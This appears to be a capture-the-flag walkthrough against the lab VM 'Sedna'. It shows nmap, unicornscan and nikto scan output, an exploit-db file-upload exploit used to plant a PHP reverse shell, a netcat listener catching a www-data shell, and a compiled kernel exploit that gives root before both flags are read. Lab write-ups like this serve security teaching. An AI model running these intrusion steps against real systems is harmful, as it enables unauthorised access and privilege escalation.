root@kali:/tmp# nmap -sT -A -P0 172.16.94.135
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-17 14:29 EDT
Nmap scan report for 172.16.94.135
Host is up (0.00055s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
| 2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|_ 256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
53/tcp open domain ISC BIND 9.9.5-3-Ubuntu
| dns-nsid:
|_ bind.version: 9.9.5-3-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3?
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 38660/udp status
|_ 100024 1 46739/tcp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: CAPABILITY
445/tcp open netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after: 2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after: 2026-10-07T19:17:14
|_ssl-date: ERROR: Script execution failed (use -d to debug)
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:68:AD:36 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 4.1.6-Ubuntu)
| NetBIOS computer name: SEDNA\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2017-03-17T14:31:40-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.55 ms 172.16.94.135
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.99 seconds
root@kali:~# us -mT -Iv 172.16.94.135:a -r 3000 -R 3 && us -mU -Iv 172.16.94.135:a -r 3000 -R 3
adding 172.16.94.135/32 mode `TCPscan' ports `a' pps 3000
using interface(s) eth0
scaning 1.00e+00 total hosts with 1.97e+05 total packets, should take a little longer than 1 Minutes, 12 Seconds
TCP open 172.16.94.135:22 ttl 64
TCP open 172.16.94.135:995 ttl 64
TCP open 172.16.94.135:111 ttl 64
TCP open 172.16.94.135:8080 ttl 64
TCP open 172.16.94.135:139 ttl 64
TCP open 172.16.94.135:110 ttl 64
TCP open 172.16.94.135:53 ttl 64
TCP open 172.16.94.135:993 ttl 64
TCP open 172.16.94.135:445 ttl 64
TCP open 172.16.94.135:143 ttl 64
TCP open 172.16.94.135:50201 ttl 64
TCP open 172.16.94.135:80 ttl 64
sender statistics 1908.1 pps with 196608 packets sent total
listener statistics 409090 packets recieved 0 packets droped and 0 interface drops
TCP open ssh[ 22] from 172.16.94.135 ttl 64
TCP open domain[ 53] from 172.16.94.135 ttl 64
TCP open http[ 80] from 172.16.94.135 ttl 64
TCP open pop3[ 110] from 172.16.94.135 ttl 64
TCP open sunrpc[ 111] from 172.16.94.135 ttl 64
TCP open netbios-ssn[ 139] from 172.16.94.135 ttl 64
TCP open imap[ 143] from 172.16.94.135 ttl 64
TCP open microsoft-ds[ 445] from 172.16.94.135 ttl 64
TCP open imaps[ 993] from 172.16.94.135 ttl 64
TCP open pop3s[ 995] from 172.16.94.135 ttl 64
TCP open http-alt[ 8080] from 172.16.94.135 ttl 64
TCP open unknown[50201] from 172.16.94.135 ttl 64
adding 172.16.94.135/32 mode `UDPscan' ports `a' pps 3000
using interface(s) eth0
scaning 1.00e+00 total hosts with 1.97e+05 total packets, should take a little longer than 1 Minutes, 12 Seconds
UDP open 172.16.94.135:53 ttl 64
UDP open 172.16.94.135:111 ttl 64
UDP open 172.16.94.135:137 ttl 64
UDP open 172.16.94.135:5353 ttl 255
sender statistics 1732.9 pps with 196635 packets sent total
listener statistics 36 packets recieved 0 packets droped and 0 interface drops
UDP open domain[ 53] from 172.16.94.135 ttl 64
UDP open sunrpc[ 111] from 172.16.94.135 ttl 64
UDP open netbios-ns[ 137] from 172.16.94.135 ttl 64
UDP open mdns[ 5353] from 172.16.94.135 ttl 255
root@kali:/tmp# nikto -h http://172.16.94.135
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.94.135
+ Target Hostname: 172.16.94.135
+ Target Port: 80
+ Start Time: 2017-03-17 14:37:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53fb059bb5bc8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /system/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ 7536 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2017-03-17 14:38:32 (GMT-4) (35 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:/tmp# nikto -h http://172.16.94.135:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.94.135
+ Target Hostname: 172.16.94.135
+ Target Port: 8080
+ Start Time: 2017-03-17 14:39:49 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ Server leaks inodes via ETags, header found with file /, fields: 0xW/1895 0x1475867860000
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 7839 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2017-03-17 14:40:30 (GMT-4) (41 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
With this I searched exploit-db and found this. I first tried to upload directly using the Firefox plugin Poster, but the uploads kept getting renamed and PHP extensions were being filtered somehow.
So I decided to try and upload the exploit first, then use it to upload the php-reverse-shell. This got me a limited shell on the system.
root@kali:/tmp# nc -lvp 443
listening on [any] 443 ...
172.16.94.135: inverse host lookup failed: Unknown host
connect to [172.16.94.130] from (UNKNOWN) [172.16.94.135] 58774
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
14:57:01 up 2 days, 20 min, 0 users, load average: 0.00, 0.03, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
www-data@Sedna:/var/www$ cat flag.txt
cat flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289
www-data@Sedna:/var/www$
www-data@Sedna:/tmp/sploits/expl$ gcc newpid.c -o newpid
gcc newpid.c -o newpid
newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
# warning this file must be compiled with -static
^
www-data@Sedna:/tmp/sploits/expl$ ./newpid
./newpid
newpid: you *must* compile with -static
www-data@Sedna:/tmp/sploits/expl$ gcc newpid.c -o newpid -static
gcc newpid.c -o newpid -static
newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
# warning this file must be compiled with -static
^
www-data@Sedna:/tmp/sploits/expl$ ./newpid
./newpid
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
# id
id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
# pwd
pwd
/tmp/sploits/expl
# cd /root
cd /root
# ls
ls
8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip chkrootkit flag.txt
# cat flag.txt
cat flag.txt
a10828bee17db751de4b936614558305
#